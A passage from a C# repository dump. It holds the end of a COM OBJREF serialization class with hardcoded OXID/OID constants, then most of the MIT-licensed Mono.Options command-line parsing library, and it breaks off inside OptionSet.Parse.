| 181 | internal void Save(BinaryWriter bw) { 182 | 183 | byte[] stringBinding = StringBinding.GetBytes(); 184 | byte[] securityBinding = SecurityBinding.GetBytes(); 185 | 186 | bw.Write((ushort)((stringBinding.Length + securityBinding.Length) / 2)); 187 | bw.Write((ushort)(stringBinding.Length / 2)); 188 | bw.Write(stringBinding); 189 | bw.Write(securityBinding); 190 | } 191 | } 192 | 193 | public class Standard { 194 | 195 | const ulong Oxid = 0x0703d84a06ec96cc; 196 | const ulong Oid = 0x539d029cce31ac; 197 | 198 | public readonly uint Flags; 199 | public readonly uint PublicRefs; 200 | public readonly ulong OXID; 201 | public readonly ulong OID; 202 | public readonly Guid IPID; 203 | public readonly DualStringArray DualStringArray; 204 | 205 | public Standard(uint flags, uint publicRefs, ulong oxid, ulong oid, Guid ipid, DualStringArray dualStringArray) { 206 | Flags = flags; 207 | PublicRefs = publicRefs; 208 | OXID = oxid; 209 | OID = oid; 210 | IPID = ipid; 211 | DualStringArray = dualStringArray; 212 | } 213 | 214 | public Standard(BinaryReader br) { 215 | Flags = br.ReadUInt32(); 216 | PublicRefs = br.ReadUInt32(); 217 | OXID = br.ReadUInt64(); 218 | OID = br.ReadUInt64(); 219 | IPID = new Guid(br.ReadBytes(16)); 220 | 221 | DualStringArray = new DualStringArray(br); 222 | } 223 | 224 | internal void Save(BinaryWriter bw) { 225 | bw.Write(Flags); 226 | bw.Write(PublicRefs); 227 | bw.Write(OXID); 228 | bw.Write(OID); 229 | bw.Write(IPID.ToByteArray()); 230 | DualStringArray.Save(bw); 231 | } 232 | } 233 | } 234 | } 235 | -------------------------------------------------------------------------------- /Options.cs: -------------------------------------------------------------------------------- 1 | // 2 | // Options.cs 3 | // 4 | // Authors: 5 | // Jonathan Pryor , 6 | // Federico Di Gregorio 7 | // Rolf Bjarne Kvinge 8 | // 9 | // Copyright (C) 2008 Novell (http://www.novell.com) 10 | // Copyright (C) 2009 Federico Di Gregorio. 11 | // Copyright (C) 2012 Xamarin Inc (http://www.xamarin.com) 12 | // Copyright (C) 2017 Microsoft Corporation (http://www.microsoft.com) 13 | // 14 | // Permission is hereby granted, free of charge, to any person obtaining 15 | // a copy of this software and associated documentation files (the 16 | // "Software"), to deal in the Software without restriction, including 17 | // without limitation the rights to use, copy, modify, merge, publish, 18 | // distribute, sublicense, and/or sell copies of the Software, and to 19 | // permit persons to whom the Software is furnished to do so, subject to 20 | // the following conditions: 21 | // 22 | // The above copyright notice and this permission notice shall be 23 | // included in all copies or substantial portions of the Software. 24 | // 25 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 26 | // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 27 | // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 28 | // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 29 | // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 30 | // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 31 | // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 32 | // 33 | 34 | // Compile With: 35 | // mcs -debug+ -r:System.Core Options.cs -o:Mono.Options.dll -t:library 36 | // mcs -debug+ -d:LINQ -r:System.Core Options.cs -o:Mono.Options.dll -t:library 37 | // 38 | // The LINQ version just changes the implementation of 39 | // OptionSet.Parse(IEnumerable), and confers no semantic changes. 40 | 41 | // 42 | // A Getopt::Long-inspired option parsing library for C#. 43 | // 44 | // Mono.Options.OptionSet is built upon a key/value table, where the 45 | // key is a option format string and the value is a delegate that is 46 | // invoked when the format string is matched. 47 | // 48 | // Option format strings: 49 | // Regex-like BNF Grammar: 50 | // name: .+ 51 | // type: [=:] 52 | // sep: ( [^{}]+ | '{' .+ '}' )? 53 | // aliases: ( name type sep ) ( '|' name type sep )* 54 | // 55 | // Each '|'-delimited name is an alias for the associated action. If the 56 | // format string ends in a '=', it has a required value. If the format 57 | // string ends in a ':', it has an optional value. If neither '=' or ':' 58 | // is present, no value is supported. `=' or `:' need only be defined on one 59 | // alias, but if they are provided on more than one they must be consistent. 60 | // 61 | // Each alias portion may also end with a "key/value separator", which is used 62 | // to split option values if the option accepts > 1 value. If not specified, 63 | // it defaults to '=' and ':'. If specified, it can be any character except 64 | // '{' and '}' OR the *string* between '{' and '}'. If no separator should be 65 | // used (i.e. the separate values should be distinct arguments), then "{}" 66 | // should be used as the separator. 67 | // 68 | // Options are extracted either from the current option by looking for 69 | // the option name followed by an '=' or ':', or is taken from the 70 | // following option IFF: 71 | // - The current option does not contain a '=' or a ':' 72 | // - The current option requires a value (i.e. not a Option type of ':') 73 | // 74 | // The `name' used in the option format string does NOT include any leading 75 | // option indicator, such as '-', '--', or '/'. All three of these are 76 | // permitted/required on any named option. 77 | // 78 | // Option bundling is permitted so long as: 79 | // - '-' is used to start the option group 80 | // - all of the bundled options are a single character 81 | // - at most one of the bundled options accepts a value, and the value 82 | // provided starts from the next character to the end of the string. 83 | // 84 | // This allows specifying '-a -b -c' as '-abc', and specifying '-D name=value' 85 | // as '-Dname=value'. 86 | // 87 | // Option processing is disabled by specifying "--". All options after "--" 88 | // are returned by OptionSet.Parse() unchanged and unprocessed. 89 | // 90 | // Unprocessed options are returned from OptionSet.Parse(). 91 | // 92 | // Examples: 93 | // int verbose = 0; 94 | // OptionSet p = new OptionSet () 95 | // .Add ("v", v => ++verbose) 96 | // .Add ("name=|value=", v => Console.WriteLine (v)); 97 | // p.Parse (new string[]{"-v", "--v", "/v", "-name=A", "/name", "B", "extra"}); 98 | // 99 | // The above would parse the argument string array, and would invoke the 100 | // lambda expression three times, setting `verbose' to 3 when complete. 101 | // It would also print out "A" and "B" to standard output. 102 | // The returned array would contain the string "extra". 103 | // 104 | // C# 3.0 collection initializers are supported and encouraged: 105 | // var p = new OptionSet () { 106 | // { "h|?|help", v => ShowHelp () }, 107 | // }; 108 | // 109 | // System.ComponentModel.TypeConverter is also supported, allowing the use of 110 | // custom data types in the callback type; TypeConverter.ConvertFromString() 111 | // is used to convert the value option to an instance of the specified 112 | // type: 113 | // 114 | // var p = new OptionSet () { 115 | // { "foo=", (Foo f) => Console.WriteLine (f.ToString ()) }, 116 | // }; 117 | // 118 | // Random other tidbits: 119 | // - Boolean options (those w/o '=' or ':' in the option format string) 120 | // are explicitly enabled if they are followed with '+', and explicitly 121 | // disabled if they are followed with '-': 122 | // string a = null; 123 | // var p = new OptionSet () { 124 | // { "a", s => a = s }, 125 | // }; 126 | // p.Parse (new string[]{"-a"}); // sets v != null 127 | // p.Parse (new string[]{"-a+"}); // sets v != null 128 | // p.Parse (new string[]{"-a-"}); // sets v == null 129 | // 130 | 131 | // 132 | // Mono.Options.CommandSet allows easily having separate commands and 133 | // associated command options, allowing creation of a *suite* along the 134 | // lines of **git**(1), **svn**(1), etc. 135 | // 136 | // CommandSet allows intermixing plain text strings for `--help` output, 137 | // Option values -- as supported by OptionSet -- and Command instances, 138 | // which have a name, optional help text, and an optional OptionSet. 139 | // 140 | // var suite = new CommandSet ("suite-name") { 141 | // // Use strings and option values, as with OptionSet 142 | // "usage: suite-name COMMAND [OPTIONS]+", 143 | // { "v:", "verbosity", (int? v) => Verbosity = v.HasValue ? v.Value : Verbosity+1 }, 144 | // // Commands may also be specified 145 | // new Command ("command-name", "command help") { 146 | // Options = new OptionSet {/*...*/}, 147 | // Run = args => { /*...*/}, 148 | // }, 149 | // new MyCommandSubclass (), 150 | // }; 151 | // return suite.Run (new string[]{...}); 152 | // 153 | // CommandSet provides a `help` command, and forwards `help COMMAND` 154 | // to the registered Command instance by invoking Command.Invoke() 155 | // with `--help` as an option. 156 | // 157 | 158 | using System; 159 | using System.Collections; 160 | using System.Collections.Generic; 161 | using System.Collections.ObjectModel; 162 | using System.ComponentModel; 163 | using System.Globalization; 164 | using System.IO; 165 | #if PCL 166 | using System.Reflection; 167 | #else 168 | using System.Runtime.Serialization; 169 | using System.Security.Permissions; 170 | #endif 171 | using System.Text; 172 | using System.Text.RegularExpressions; 173 | 174 | #if LINQ 175 | using System.Linq; 176 | #endif 177 | 178 | #if TEST 179 | using NDesk.Options; 180 | #endif 181 | 182 | #if PCL 183 | using MessageLocalizerConverter = System.Func; 184 | #else 185 | using MessageLocalizerConverter = System.Converter; 186 | #endif 187 | 188 | #if NDESK_OPTIONS 189 | namespace NDesk.Options 190 | #else 191 | namespace Mono.Options 192 | #endif 193 | { 194 | static class StringCoda { 195 | 196 | public static IEnumerable WrappedLines(string self, params int[] widths) { 197 | IEnumerable w = widths; 198 | return WrappedLines(self, w); 199 | } 200 | 201 | public static IEnumerable WrappedLines(string self, IEnumerable widths) { 202 | if (widths == null) 203 | throw new ArgumentNullException("widths"); 204 | return CreateWrappedLinesIterator(self, widths); 205 | } 206 | 207 | private static IEnumerable CreateWrappedLinesIterator(string self, IEnumerable widths) { 208 | if (string.IsNullOrEmpty(self)) { 209 | yield return string.Empty; 210 | yield break; 211 | } 212 | using (IEnumerator ewidths = widths.GetEnumerator()) { 213 | bool? hw = null; 214 | int width = GetNextWidth(ewidths, int.MaxValue, ref hw); 215 | int start = 0, end; 216 | do { 217 | end = GetLineEnd(start, width, self); 218 | // endCorrection is 1 if the line end is '\n', and might be 2 if the line end is '\r\n'. 219 | int endCorrection = 1; 220 | if (end >= 2 && self.Substring(end - 2, 2).Equals("\r\n")) 221 | endCorrection = 2; 222 | char c = self[end - endCorrection]; 223 | if (char.IsWhiteSpace(c)) 224 | end -= endCorrection; 225 | bool needContinuation = end != self.Length && !IsEolChar(c); 226 | string continuation = ""; 227 | if (needContinuation) { 228 | --end; 229 | continuation = "-"; 230 | } 231 | string line = self.Substring(start, end - start) + continuation; 232 | yield return line; 233 | start = end; 234 | if (char.IsWhiteSpace(c)) 235 | start += endCorrection; 236 | width = GetNextWidth(ewidths, width, ref hw); 237 | } while (start < self.Length); 238 | } 239 | } 240 | 241 | private static int GetNextWidth(IEnumerator ewidths, int curWidth, ref bool? eValid) { 242 | if (!eValid.HasValue || (eValid.HasValue && eValid.Value)) { 243 | curWidth = (eValid = ewidths.MoveNext()).Value ? ewidths.Current : curWidth; 244 | // '.' is any character, - is for a continuation 245 | const string minWidth = ".-"; 246 | if (curWidth < minWidth.Length) 247 | throw new ArgumentOutOfRangeException("widths", 248 | string.Format("Element must be >= {0}, was {1}.", minWidth.Length, curWidth)); 249 | return curWidth; 250 | } 251 | // no more elements, use the last element. 252 | return curWidth; 253 | } 254 | 255 | private static bool IsEolChar(char c) { 256 | return !char.IsLetterOrDigit(c); 257 | } 258 | 259 | private static int GetLineEnd(int start, int length, string description) { 260 | int end = System.Math.Min(start + length, description.Length); 261 | int sep = -1; 262 | for (int i = start; i < end; ++i) { 263 | if (i + 2 <= description.Length && description.Substring(i, 2).Equals("\r\n")) 264 | return i + 2; 265 | if (description[i] == '\n') 266 | return i + 1; 267 | if (IsEolChar(description[i])) 268 | sep = i + 1; 269 | } 270 | if (sep == -1 || end == description.Length) 271 | return end; 272 | return sep; 273 | } 274 | } 275 | 276 | public class OptionValueCollection : IList, IList { 277 | 278 | List values = new List(); 279 | OptionContext c; 280 | 281 | internal OptionValueCollection(OptionContext c) { 282 | this.c = c; 283 | } 284 | 285 | #region ICollection 286 | void ICollection.CopyTo(Array array, int index) { (values as ICollection).CopyTo(array, index); } 287 | bool ICollection.IsSynchronized { get { return (values as ICollection).IsSynchronized; } } 288 | object ICollection.SyncRoot { get { return (values as ICollection).SyncRoot; } } 289 | #endregion 290 | 291 | #region ICollection 292 | public void Add(string item) { values.Add(item); } 293 | public void Clear() { values.Clear(); } 294 | public bool Contains(string item) { return values.Contains(item); } 295 | public void CopyTo(string[] array, int arrayIndex) { values.CopyTo(array, arrayIndex); } 296 | public bool Remove(string item) { return values.Remove(item); } 297 | public int Count { get { return values.Count; } } 298 | public bool IsReadOnly { get { return false; } } 299 | #endregion 300 | 301 | #region IEnumerable 302 | IEnumerator IEnumerable.GetEnumerator() { return values.GetEnumerator(); } 303 | #endregion 304 | 305 | #region IEnumerable 306 | public IEnumerator GetEnumerator() { return values.GetEnumerator(); } 307 | #endregion 308 | 309 | #region IList 310 | int IList.Add(object value) { return (values as IList).Add(value); } 311 | bool IList.Contains(object value) { return (values as IList).Contains(value); } 312 | int IList.IndexOf(object value) { return (values as IList).IndexOf(value); } 313 | void IList.Insert(int index, object value) { (values as IList).Insert(index, value); } 314 | void IList.Remove(object value) { (values as IList).Remove(value); } 315 | void IList.RemoveAt(int index) { (values as IList).RemoveAt(index); } 316 | bool IList.IsFixedSize { get { return false; } } 317 | object IList.this[int index] { get { return this[index]; } set { (values as IList)[index] = value; } } 318 | #endregion 319 | 320 | #region IList 321 | public int IndexOf(string item) { return values.IndexOf(item); } 322 | public void Insert(int index, string item) { values.Insert(index, item); } 323 | public void RemoveAt(int index) { values.RemoveAt(index); } 324 | 325 | private void AssertValid(int index) { 326 | if (c.Option == null) 327 | throw new InvalidOperationException("OptionContext.Option is null."); 328 | if (index >= c.Option.MaxValueCount) 329 | throw new ArgumentOutOfRangeException("index"); 330 | if (c.Option.OptionValueType == OptionValueType.Required && 331 | index >= values.Count) 332 | throw new OptionException(string.Format( 333 | c.OptionSet.MessageLocalizer("Missing required value for option '{0}'."), c.OptionName), 334 | c.OptionName); 335 | } 336 | 337 | public string this[int index] { 338 | get { 339 | AssertValid(index); 340 | return index >= values.Count ? null : values[index]; 341 | } 342 | set { 343 | values[index] = value; 344 | } 345 | } 346 | #endregion 347 | 348 | public List ToList() { 349 | return new List(values); 350 | } 351 | 352 | public string[] ToArray() { 353 | return values.ToArray(); 354 | } 355 | 356 | public override string ToString() { 357 | return string.Join(", ", values.ToArray()); 358 | } 359 | } 360 | 361 | public class OptionContext { 362 | private Option option; 363 | private string name; 364 | private int index; 365 | private OptionSet set; 366 | private OptionValueCollection c; 367 | 368 | public OptionContext(OptionSet set) { 369 | this.set = set; 370 | this.c = new OptionValueCollection(this); 371 | } 372 | 373 | public Option Option { 374 | get { return option; } 375 | set { option = value; } 376 | } 377 | 378 | public string OptionName { 379 | get { return name; } 380 | set { name = value; } 381 | } 382 | 383 | public int OptionIndex { 384 | get { return index; } 385 | set { index = value; } 386 | } 387 | 388 | public OptionSet OptionSet { 389 | get { return set; } 390 | } 391 | 392 | public OptionValueCollection OptionValues { 393 | get { return c; } 394 | } 395 | } 396 | 397 | public enum OptionValueType { 398 | None, 399 | Optional, 400 | Required, 401 | } 402 | 403 | public abstract class Option { 404 | string prototype, description; 405 | string[] names; 406 | OptionValueType type; 407 | int count; 408 | string[] separators; 409 | bool hidden; 410 | 411 | protected Option(string prototype, string description) 412 | : this(prototype, description, 1, false) { 413 | } 414 | 415 | protected Option(string prototype, string description, int maxValueCount) 416 | : this(prototype, description, maxValueCount, false) { 417 | } 418 | 419 | protected Option(string prototype, string description, int maxValueCount, bool hidden) { 420 | if (prototype == null) 421 | throw new ArgumentNullException("prototype"); 422 | if (prototype.Length == 0) 423 | throw new ArgumentException("Cannot be the empty string.", "prototype"); 424 | if (maxValueCount < 0) 425 | throw new ArgumentOutOfRangeException("maxValueCount"); 426 | 427 | this.prototype = prototype; 428 | this.description = description; 429 | this.count = maxValueCount; 430 | this.names = (this is OptionSet.Category) 431 | // append GetHashCode() so that "duplicate" categories have distinct 432 | // names, e.g. adding multiple "" categories should be valid. 433 | ? new[] { prototype + this.GetHashCode() } 434 | : prototype.Split('|'); 435 | 436 | if (this is OptionSet.Category || this is CommandOption) 437 | return; 438 | 439 | this.type = ParsePrototype(); 440 | this.hidden = hidden; 441 | 442 | if (this.count == 0 && type != OptionValueType.None) 443 | throw new ArgumentException( 444 | "Cannot provide maxValueCount of 0 for OptionValueType.Required or " + 445 | "OptionValueType.Optional.", 446 | "maxValueCount"); 447 | if (this.type == OptionValueType.None && maxValueCount > 1) 448 | throw new ArgumentException( 449 | string.Format("Cannot provide maxValueCount of {0} for OptionValueType.None.", maxValueCount), 450 | "maxValueCount"); 451 | if (Array.IndexOf(names, "<>") >= 0 && 452 | ((names.Length == 1 && this.type != OptionValueType.None) || 453 | (names.Length > 1 && this.MaxValueCount > 1))) 454 | throw new ArgumentException( 455 | "The default option handler '<>' cannot require values.", 456 | "prototype"); 457 | } 458 | 459 | public string Prototype { get { return prototype; } } 460 | public string Description { get { return description; } } 461 | public OptionValueType OptionValueType { get { return type; } } 462 | public int MaxValueCount { get { return count; } } 463 | public bool Hidden { get { return hidden; } } 464 | 465 | public string[] GetNames() { 466 | return (string[])names.Clone(); 467 | } 468 | 469 | public string[] GetValueSeparators() { 470 | if (separators == null) 471 | return new string[0]; 472 | return (string[])separators.Clone(); 473 | } 474 | 475 | protected static T Parse(string value, OptionContext c) { 476 | Type tt = typeof(T); 477 | #if PCL 478 | TypeInfo ti = tt.GetTypeInfo (); 479 | #else 480 | Type ti = tt; 481 | #endif 482 | bool nullable = 483 | ti.IsValueType && 484 | ti.IsGenericType && 485 | !ti.IsGenericTypeDefinition && 486 | ti.GetGenericTypeDefinition() == typeof(Nullable<>); 487 | #if PCL 488 | Type targetType = nullable ? tt.GenericTypeArguments [0] : tt; 489 | #else 490 | Type targetType = nullable ? tt.GetGenericArguments()[0] : tt; 491 | #endif 492 | T t = default(T); 493 | try { 494 | if (value != null) { 495 | #if PCL 496 | if (targetType.GetTypeInfo ().IsEnum) 497 | t = (T) Enum.Parse (targetType, value, true); 498 | else 499 | t = (T) Convert.ChangeType (value, targetType); 500 | #else 501 | TypeConverter conv = TypeDescriptor.GetConverter(targetType); 502 | t = (T)conv.ConvertFromString(value); 503 | #endif 504 | } 505 | } catch (Exception e) { 506 | throw new OptionException( 507 | string.Format( 508 | c.OptionSet.MessageLocalizer("Could not convert string `{0}' to type {1} for option `{2}'."), 509 | value, targetType.Name, c.OptionName), 510 | c.OptionName, e); 511 | } 512 | return t; 513 | } 514 | 515 | internal string[] Names { get { return names; } } 516 | internal string[] ValueSeparators { get { return separators; } } 517 | 518 | static readonly char[] NameTerminator = new char[] { '=', ':' }; 519 | 520 | private OptionValueType ParsePrototype() { 521 | char type = '\0'; 522 | List seps = new List(); 523 | for (int i = 0; i < names.Length; ++i) { 524 | string name = names[i]; 525 | if (name.Length == 0) 526 | throw new ArgumentException("Empty option names are not supported.", "prototype"); 527 | 528 | int end = name.IndexOfAny(NameTerminator); 529 | if (end == -1) 530 | continue; 531 | names[i] = name.Substring(0, end); 532 | if (type == '\0' || type == name[end]) 533 | type = name[end]; 534 | else 535 | throw new ArgumentException( 536 | string.Format("Conflicting option types: '{0}' vs. '{1}'.", type, name[end]), 537 | "prototype"); 538 | AddSeparators(name, end, seps); 539 | } 540 | 541 | if (type == '\0') 542 | return OptionValueType.None; 543 | 544 | if (count <= 1 && seps.Count != 0) 545 | throw new ArgumentException( 546 | string.Format("Cannot provide key/value separators for Options taking {0} value(s).", count), 547 | "prototype"); 548 | if (count > 1) { 549 | if (seps.Count == 0) 550 | this.separators = new string[] { ":", "=" }; 551 | else if (seps.Count == 1 && seps[0].Length == 0) 552 | this.separators = null; 553 | else 554 | this.separators = seps.ToArray(); 555 | } 556 | 557 | return type == '=' ? OptionValueType.Required : OptionValueType.Optional; 558 | } 559 | 560 | private static void AddSeparators(string name, int end, ICollection seps) { 561 | int start = -1; 562 | for (int i = end + 1; i < name.Length; ++i) { 563 | switch (name[i]) { 564 | case '{': 565 | if (start != -1) 566 | throw new ArgumentException( 567 | string.Format("Ill-formed name/value separator found in \"{0}\".", name), 568 | "prototype"); 569 | start = i + 1; 570 | break; 571 | case '}': 572 | if (start == -1) 573 | throw new ArgumentException( 574 | string.Format("Ill-formed name/value separator found in \"{0}\".", name), 575 | "prototype"); 576 | seps.Add(name.Substring(start, i - start)); 577 | start = -1; 578 | break; 579 | default: 580 | if (start == -1) 581 | seps.Add(name[i].ToString()); 582 | break; 583 | } 584 | } 585 | if (start != -1) 586 | throw new ArgumentException( 587 | string.Format("Ill-formed name/value separator found in \"{0}\".", name), 588 | "prototype"); 589 | } 590 | 591 | public void Invoke(OptionContext c) { 592 | OnParseComplete(c); 593 | c.OptionName = null; 594 | c.Option = null; 595 | c.OptionValues.Clear(); 596 | } 597 | 598 | protected abstract void OnParseComplete(OptionContext c); 599 | 600 | internal void InvokeOnParseComplete(OptionContext c) { 601 | OnParseComplete(c); 602 | } 603 | 604 | public override string ToString() { 605 | return Prototype; 606 | } 607 | } 608 | 609 | public abstract class ArgumentSource { 610 | 611 | protected ArgumentSource() { 612 | } 613 | 614 | public abstract string[] GetNames(); 615 | public abstract string Description { get; } 616 | public abstract bool GetArguments(string value, out IEnumerable replacement); 617 | 618 | #if !PCL || NETSTANDARD1_3 619 | public static IEnumerable GetArgumentsFromFile(string file) { 620 | return GetArguments(File.OpenText(file), true); 621 | } 622 | #endif 623 | 624 | public static IEnumerable GetArguments(TextReader reader) { 625 | return GetArguments(reader, false); 626 | } 627 | 628 | // Cribbed from mcs/driver.cs:LoadArgs(string) 629 | static IEnumerable GetArguments(TextReader reader, bool close) { 630 | try { 631 | StringBuilder arg = new StringBuilder(); 632 | 633 | string line; 634 | while ((line = reader.ReadLine()) != null) { 635 | int t = line.Length; 636 | 637 | for (int i = 0; i < t; i++) { 638 | char c = line[i]; 639 | 640 | if (c == '"' || c == '\'') { 641 | char end = c; 642 | 643 | for (i++; i < t; i++) { 644 | c = line[i]; 645 | 646 | if (c == end) 647 | break; 648 | arg.Append(c); 649 | } 650 | } else if (c == ' ') { 651 | if (arg.Length > 0) { 652 | yield return arg.ToString(); 653 | arg.Length = 0; 654 | } 655 | } else 656 | arg.Append(c); 657 | } 658 | if (arg.Length > 0) { 659 | yield return arg.ToString(); 660 | arg.Length = 0; 661 | } 662 | } 663 | } finally { 664 | if (close) 665 | reader.Dispose(); 666 | } 667 | } 668 | } 669 | 670 | #if !PCL || NETSTANDARD1_3 671 | public class ResponseFileSource : ArgumentSource { 672 | 673 | public override string[] GetNames() { 674 | return new string[] { "@file" }; 675 | } 676 | 677 | public override string Description { 678 | get { return "Read response file for more options."; } 679 | } 680 | 681 | public override bool GetArguments(string value, out IEnumerable replacement) { 682 | if (string.IsNullOrEmpty(value) || !value.StartsWith("@")) { 683 | replacement = null; 684 | return false; 685 | } 686 | replacement = ArgumentSource.GetArgumentsFromFile(value.Substring(1)); 687 | return true; 688 | } 689 | } 690 | #endif 691 | 692 | #if !PCL 693 | [Serializable] 694 | #endif 695 | public class OptionException : Exception { 696 | private string option; 697 | 698 | public OptionException() { 699 | } 700 | 701 | public OptionException(string message, string optionName) 702 | : base(message) { 703 | this.option = optionName; 704 | } 705 | 706 | public OptionException(string message, string optionName, Exception innerException) 707 | : base(message, innerException) { 708 | this.option = optionName; 709 | } 710 | 711 | #if !PCL 712 | protected OptionException(SerializationInfo info, StreamingContext context) 713 | : base(info, context) { 714 | this.option = info.GetString("OptionName"); 715 | } 716 | #endif 717 | 718 | public string OptionName { 719 | get { return this.option; } 720 | } 721 | 722 | #if !PCL 723 | #pragma warning disable 618 // SecurityPermissionAttribute is obsolete 724 | [SecurityPermission(SecurityAction.LinkDemand, SerializationFormatter = true)] 725 | #pragma warning restore 618 726 | public override void GetObjectData(SerializationInfo info, StreamingContext context) { 727 | base.GetObjectData(info, context); 728 | info.AddValue("OptionName", option); 729 | } 730 | #endif 731 | } 732 | 733 | public delegate void OptionAction(TKey key, TValue value); 734 | 735 | public class OptionSet : KeyedCollection { 736 | public OptionSet() 737 | : this(null) { 738 | } 739 | 740 | public OptionSet(MessageLocalizerConverter localizer) { 741 | this.roSources = new ReadOnlyCollection(sources); 742 | this.localizer = localizer; 743 | if (this.localizer == null) { 744 | this.localizer = delegate (string f) { 745 | return f; 746 | }; 747 | } 748 | } 749 | 750 | MessageLocalizerConverter localizer; 751 | 752 | public MessageLocalizerConverter MessageLocalizer { 753 | get { return localizer; } 754 | internal set { localizer = value; } 755 | } 756 | 757 | List sources = new List(); 758 | ReadOnlyCollection roSources; 759 | 760 | public ReadOnlyCollection ArgumentSources { 761 | get { return roSources; } 762 | } 763 | 764 | 765 | protected override string GetKeyForItem(Option item) { 766 | if (item == null) 767 | throw new ArgumentNullException("option"); 768 | if (item.Names != null && item.Names.Length > 0) 769 | return item.Names[0]; 770 | // This should never happen, as it's invalid for Option to be 771 | // constructed w/o any names. 772 | throw new InvalidOperationException("Option has no names!"); 773 | } 774 | 775 | [Obsolete("Use KeyedCollection.this[string]")] 776 | protected Option GetOptionForName(string option) { 777 | if (option == null) 778 | throw new ArgumentNullException("option"); 779 | try { 780 | return base[option]; 781 | } catch (KeyNotFoundException) { 782 | return null; 783 | } 784 | } 785 | 786 | protected override void InsertItem(int index, Option item) { 787 | base.InsertItem(index, item); 788 | AddImpl(item); 789 | } 790 | 791 | protected override void RemoveItem(int index) { 792 | Option p = Items[index]; 793 | base.RemoveItem(index); 794 | // KeyedCollection.RemoveItem() handles the 0th item 795 | for (int i = 1; i < p.Names.Length; ++i) { 796 | Dictionary.Remove(p.Names[i]); 797 | } 798 | } 799 | 800 | protected override void SetItem(int index, Option item) { 801 | base.SetItem(index, item); 802 | AddImpl(item); 803 | } 804 | 805 | private void AddImpl(Option option) { 806 | if (option == null) 807 | throw new ArgumentNullException("option"); 808 | List added = new List(option.Names.Length); 809 | try { 810 | // KeyedCollection.InsertItem/SetItem handle the 0th name. 811 | for (int i = 1; i < option.Names.Length; ++i) { 812 | Dictionary.Add(option.Names[i], option); 813 | added.Add(option.Names[i]); 814 | } 815 | } catch (Exception) { 816 | foreach (string name in added) 817 | Dictionary.Remove(name); 818 | throw; 819 | } 820 | } 821 | 822 | public OptionSet Add(string header) { 823 | if (header == null) 824 | throw new ArgumentNullException("header"); 825 | Add(new Category(header)); 826 | return this; 827 | } 828 | 829 | internal sealed class Category : Option { 830 | 831 | // Prototype starts with '=' because this is an invalid prototype 832 | // (see Option.ParsePrototype(), and thus it'll prevent Category 833 | // instances from being accidentally used as normal options. 834 | public Category(string description) 835 | : base("=:Category:= " + description, description) { 836 | } 837 | 838 | protected override void OnParseComplete(OptionContext c) { 839 | throw new NotSupportedException("Category.OnParseComplete should not be invoked."); 840 | } 841 | } 842 | 843 | 844 | public new OptionSet Add(Option option) { 845 | base.Add(option); 846 | return this; 847 | } 848 | 849 | sealed class ActionOption : Option { 850 | Action action; 851 | 852 | public ActionOption(string prototype, string description, int count, Action action) 853 | : this(prototype, description, count, action, false) { 854 | } 855 | 856 | public ActionOption(string prototype, string description, int count, Action action, bool hidden) 857 | : base(prototype, description, count, hidden) { 858 | if (action == null) 859 | throw new ArgumentNullException("action"); 860 | this.action = action; 861 | } 862 | 863 | protected override void OnParseComplete(OptionContext c) { 864 | action(c.OptionValues); 865 | } 866 | } 867 | 868 | public OptionSet Add(string prototype, Action action) { 869 | return Add(prototype, null, action); 870 | } 871 | 872 | public OptionSet Add(string prototype, string description, Action action) { 873 | return Add(prototype, description, action, false); 874 | } 875 | 876 | public OptionSet Add(string prototype, string description, Action action, bool hidden) { 877 | if (action == null) 878 | throw new ArgumentNullException("action"); 879 | Option p = new ActionOption(prototype, description, 1, 880 | delegate (OptionValueCollection v) { action(v[0]); }, hidden); 881 | base.Add(p); 882 | return this; 883 | } 884 | 885 | public OptionSet Add(string prototype, OptionAction action) { 886 | return Add(prototype, null, action); 887 | } 888 | 889 | public OptionSet Add(string prototype, string description, OptionAction action) { 890 | return Add(prototype, description, action, false); 891 | } 892 | 893 | public OptionSet Add(string prototype, string description, OptionAction action, bool hidden) { 894 | if (action == null) 895 | throw new ArgumentNullException("action"); 896 | Option p = new ActionOption(prototype, description, 2, 897 | delegate (OptionValueCollection v) { action(v[0], v[1]); }, hidden); 898 | base.Add(p); 899 | return this; 900 | } 901 | 902 | sealed class ActionOption : Option { 903 | Action action; 904 | 905 | public ActionOption(string prototype, string description, Action action) 906 | : base(prototype, description, 1) { 907 | if (action == null) 908 | throw new ArgumentNullException("action"); 909 | this.action = action; 910 | } 911 | 912 | protected override void OnParseComplete(OptionContext c) { 913 | action(Parse(c.OptionValues[0], c)); 914 | } 915 | } 916 | 917 | sealed class ActionOption : Option { 918 | OptionAction action; 919 | 920 | public ActionOption(string prototype, string description, OptionAction action) 921 | : base(prototype, description, 2) { 922 | if (action == null) 923 | throw new ArgumentNullException("action"); 924 | this.action = action; 925 | } 926 | 927 | protected override void OnParseComplete(OptionContext c) { 928 | action( 929 | Parse(c.OptionValues[0], c), 930 | Parse(c.OptionValues[1], c)); 931 | } 932 | } 933 | 934 | public OptionSet Add(string prototype, Action action) { 935 | return Add(prototype, null, action); 936 | } 937 | 938 | public OptionSet Add(string prototype, string description, Action action) { 939 | return Add(new ActionOption(prototype, description, action)); 940 | } 941 | 942 | public OptionSet Add(string prototype, OptionAction action) { 943 | return Add(prototype, null, action); 944 | } 945 | 946 | public OptionSet Add(string prototype, string description, OptionAction action) { 947 | return Add(new ActionOption(prototype, description, action)); 948 | } 949 | 950 | public OptionSet Add(ArgumentSource source) { 951 | if (source == null) 952 | throw new ArgumentNullException("source"); 953 | sources.Add(source); 954 | return this; 955 | } 956 | 957 | protected virtual OptionContext CreateOptionContext() { 958 | return new OptionContext(this); 959 | } 960 | 961 | public List Parse(IEnumerable arguments) { 962 | if (arguments == null) 963 | throw new ArgumentNullException("arguments"); 964 | OptionContext c = CreateOptionContext(); 965 | c.OptionIndex = -1; 966 | bool process = true; 967 | List unprocessed = new List(); 968 | Option def = Contains("<>") ? this["<>"] : null; 969 | ArgumentEnumerator ae = new ArgumentEnumerator(arguments); 970 | foreach (string argument in ae) { 971 | ++c.OptionIndex; 972 | 